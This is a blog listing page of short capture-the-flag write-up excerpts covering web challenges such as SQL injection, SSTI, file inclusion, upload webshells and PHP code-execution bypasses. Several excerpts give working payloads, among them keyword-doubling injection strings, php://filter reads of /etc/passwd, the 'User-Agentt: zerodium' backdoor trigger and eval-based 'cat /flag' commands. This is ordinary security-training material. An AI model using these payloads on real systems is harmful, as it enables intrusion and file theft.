自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

末初 · mochu7

一直向前,一直向上

  • 博客(24)
  • 论坛 (1)
  • 收藏
  • 关注

原创 BMZCTF:baby_sql

http://www.bmzclub.cn/challenges#baby_sql简单的SQL注入,过滤了一些关键字符,但是过滤进制都是直接替换为空。有机可趁,直接双写绕过/check.php?username=mochu7'oorrder/**/bbyy/**/4%23&password=mochu7/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,3%23&password=mochu7/chec

2021-04-30 17:53:45 35

原创 BMZCTF:e

http://www.bmzclub.cn/challenges#e题目名称是e,站点功能字符串的搜索和替换,可以使用正则语法,很容易联想到preg_replace()+/e的代码执行

2021-04-30 16:57:40 22

原创 BMZCTF:upload-double

http://www.bmzclub.cn/challenges#upload-double/inc.php?inc=upload.php疑似存在文件包含,文件上传后缀被控制的无法绕过,上传图片马然后,尝试包含图片马成功包含了,但是好像执行并没有效果下载上传到服务器上的图片,发现木马的内容不见了,判断这里应该是对上传的图片进行了二次渲染,木马内容被渲染后去除了要使图片马有效,就得将木马内容写在不会被二次渲染的区域,搜索引擎找到个脚本可以将木马内容放在不会被渲染的区域,并且能够成功上传&

2021-04-30 13:26:42 26

原创 BMZCTF:sqlii

http://www.bmzclub.cn/challenges#sqlii回显了User-Agent、IP、uname数据,猜测讲这些数据插入了数据库然后查询返回,结合上图别打头,猜测就是User-Agent注入User-Agent: 'order by 5#很明显存在注入,接着就是fuzz,测试的过程中发现过滤了selectdeletedropinsertalterwhereprepareset.......并且发现存在堆叠注入User-Agent: ';sho

2021-04-28 23:23:39 47

原创 BMZCTF:凯撒也喜欢二进制

http://www.bmzclub.cn/challenges#%E5%87%AF%E6%92%92%E4%B9%9F%E5%96%9C%E6%AC%A2%E4%BA%8C%E8%BF%9B%E5%88%B6cipher.txt8为二进制一组,发现最后一组少了一位,在二进制数据前加一个0,然后Python简单处理with open('cipher.txt') as f: f = f.read() for i in range(0,len(f),8): prin

2021-04-28 16:39:11 43 1

原创 BMZCTF:pimps

http://www.bmzclub.cn/challenges#pimps疑似文件包含点,尝试伪协议读取源码/?op=php://filter/convert.base64-encode/resource=indexindex.php<?phperror_reporting(0);define('FROM_INDEX', 1);$op = empty($_GET['op']) ? 'home' : $_GET['op'];if(!is_string($op) || pr

2021-04-27 20:41:05 30

原创 BMZCTF:个人所得税

http://www.bmzclub.cn/challenges#%E4%B8%AA%E4%BA%BA%E6%89%80%E5%BE%97%E7%A8%8E很明显是SSTI,但是{{''.__class__.__mro__[1].__subclasses__()}}没有成功返回所有子类猜测()被过滤了,但是并不是检测到过滤字符就die,而是像是被替换为了空。所以利用双写试试{{''.__class__.__mro__[1].__subclasses__(())}}直接找os._wrap

2021-04-27 00:13:48 126 3

原创 BMZCTF:Blog

http://www.bmzclub.cn/challenges#Blog目录扫描扫到一个www.rar,查看源码发现./www/key/key.php存在代码执行很简单的绕过,直接参考我的这篇文章:浅谈PHP代码执行中出现过滤限制的绕过执行方法/key/key.php?c=(sys.tem)("ls -lha /;cat /fla*");...

2021-04-26 16:48:35 32

原创 BMZCTF:SimpleCalculator

http://www.bmzclub.cn/challenges#SimpleCalculator测试了下发现除数学相关的一些关键字之外,其他的字母都会被过滤。长度限制80。异或、取反都可以执行,猜测这里最后使用的eval()对经过过滤字符进行了代码执行,代码执行的绕过在我之前的博客讲过:浅谈PHP代码执行中出现过滤限制的绕过执行方法这里利用取反绕过即可PS C:\Users\Administrator> php -r "var_dump(urlencode(~'phpinfo'));"

2021-04-26 15:26:37 55 1

原创 BMZCTF:Bestphp

http://www.bmzclub.cn/challenges#Bestphpindex.php<?php highlight_file(__FILE__); error_reporting(0); ini_set('open_basedir', '/var/www/html:/tmp'); $file = 'function.php'; $func = isset($_GET['function'])?$_GET['function']:'filte

2021-04-25 15:15:47 43

原创 BMZCTF:zonghe

http://www.bmzclub.cn/challenges#zonghe看到这个,直接尝试可不可以伪协议读取本地文件/file.php?file=php://filter/convert.base64-encode/resource=/etc/passwd/file.php?file=php://filter/convert.base64-encode/resource=/flag>>> from base64 import *>>> b64

2021-04-25 09:44:31 21

原创 BMZCTF:up

http://www.bmzclub.cn/challenges#up什么也没有目录扫描一下访问upload.html,发现文件上传点上传之后会返回上传文件的一些信息访问upload/1.jpg,发现jpg直接被当作php来解析了直接上传图片马

2021-04-25 09:05:56 15

原创 BUUCTF:[De1CTF 2019]SSRF Me

https://buuoj.cn/challenges#[De1CTF%202019]SSRF%20Me源码#! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencodi

2021-04-24 09:54:12 41

原创 BUUCTF:[网鼎杯 2020 朱雀组]phpweb

https://buuoj.cn/challenges#[%E7%BD%91%E9%BC%8E%E6%9D%AF%202020%20%E6%9C%B1%E9%9B%80%E7%BB%84]phpweb每隔5s会自动刷新,抓包发现每次刷新,传递了两个POST参数func和pPS C:\Users\Administrator\Downloads> php -r "var_dump(date('Y-m-d h:i:s a'));"Command line code:1:string(22)

2021-04-23 16:39:28 59

原创 BUUCTF:[羊城杯 2020]signin

https://buuoj.cn/challenges#[%E7%BE%8A%E5%9F%8E%E6%9D%AF%202020]signinsignin.txtBCEHACEIBDEIBDEHBDEHADEIACEGACFIBDFHACEGBCEHBCFIBDEGBDEGADFGBDEHBDEGBDFHBCEGACFIBCFGADEIADEIADFHToy Cipher: https://eprint.iacr.org/2020/301.pdf先将密文四个一组对照第二张表转换,简单Pytho

2021-04-23 15:04:19 51 1

原创 BUUCTF:[安洵杯 2019]easy_web

https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_webTXpVek5UTTFNbVUzTURabE5qYz0经过base64decode->base64decode->hexdecode得到555.png解码编码脚本或者自己利用在线工具编码也行from binascii import *from base64 import *def decode(param): res = b64

2021-04-23 09:34:08 53

转载 BUUCTF:[b01lers2020]image_adjustments

https://buuoj.cn/challenges#[b01lers2020]image_adjustmentshttps://github.com/b01lers/b01lers-ctf-2020/tree/master/misc/image_adjustmentsadjust.py#!/usr/bin/env python3from PIL import Imagefrom random import randintimport sysf = './flag.png'im

2021-04-21 23:49:28 32

原创 BUUCTF:[BJDCTF2020]ZJCTF,不过如此

https://buuoj.cn/challenges#[BJDCTF2020]ZJCTF%EF%BC%8C%E4%B8%8D%E8%BF%87%E5%A6%82%E6%AD%A4<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "

2021-04-19 16:13:08 66

原创 BUUCTF:[BSidesSF2019]bWF0cnlvc2hrYQ==

https://buuoj.cn/challenges#[BSidesSF2019]bWF0cnlvc2hrYQ题目名字解码是:matryoshka(俄罗斯套娃)下载下来的附件是一个eml文件EML格式是微软公司为Outlook和Outlook Express开发的文件格式。EML文件是将邮件归档后生成的文件,保留着原来的HTML格式和标题。大多数邮件客户端都支持EML格式,但是如果你没有安装邮件客户端,或者你使用的是移动设备,那么你可以用其它方法打开EML格式的文件。Outlook预览下

2021-04-19 14:51:27 30

原创 BUUCTF:[BJDCTF2020]The mystery of ip

https://buuoj.cn/challenges#[BJDCTF2020]The%20mystery%20of%20ip回显了IP,在hint.php有提示Do you know why i know your ip?尝试修改X-Forwarded-For猜测这里可能是SSTI,输入{{7*7}}确定了是SSTI,尝试{{config}}看报错发现这里应该是PHP的一种比较老的引擎Smarty查看版本{$smarty.version}版本是:3.1.34-dev-7查

2021-04-18 18:44:43 41

原创 BUUCTF:[*CTF2019]babyflash

https://buuoj.cn/challenges#[*CTF2019]babyflash附件是一个flash.swf文件,需要用一个叫JPEXS Free Flash Decompiler反编译JPEXS Free Flash Decompiler:https://github.com/jindrapetrik/jpexs-decompiler/releases得到441张图片以及一个MP3音频文件MP3文件用Audacity查看频谱图得到一部分flag,接着看441张图片,应该

2021-04-18 16:44:12 32

原创 BMZCTF:simple_pop

http://bmzclub.cn/challenges#simple_pop <?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the beijing")){ echo "<br><h1>".file_get

2021-04-17 23:19:32 55

原创 2021数字中国创新大赛虎符网络安全赛-Writeup

文章目录Web签到unsetme“慢慢做”管理系统Misc你会日志分析吗sectrafficWeb签到http://cn-sec.com/archives/313267.htmlUser-Agentt: zerodiumsystem("cat /flag");unsetme这题先放着/?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27);“慢慢做”管理系统根据题目提示,这里第一步登录应该利用一些字符串被md5

2021-04-04 01:20:19 2849 7

原创 2021红明谷杯数据安全大赛技能场景赛-Writeup

文章目录Webwrite_shellhappysqleasytpjavawebMisc签到InputMonitor我的心是冰冰的歪比歪比babytraffic后续题目知道怎么做了,跟进复现会把wp补上Webwrite_shell第一步主要考察PHP代码执行,第一步先写个phpinfo()看下情况。利用php的一种短标签可以绕过分号,然后拼接一下绕过php字样。/?action=upload&data=<?=(p.hpinfo)()?>沙盒路径?action=pwd

2021-04-03 01:47:03 4523 5

空空如也

请问CSDN能够添加友链吗?

发表于 2020-03-18 最后回复 2020-03-18

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除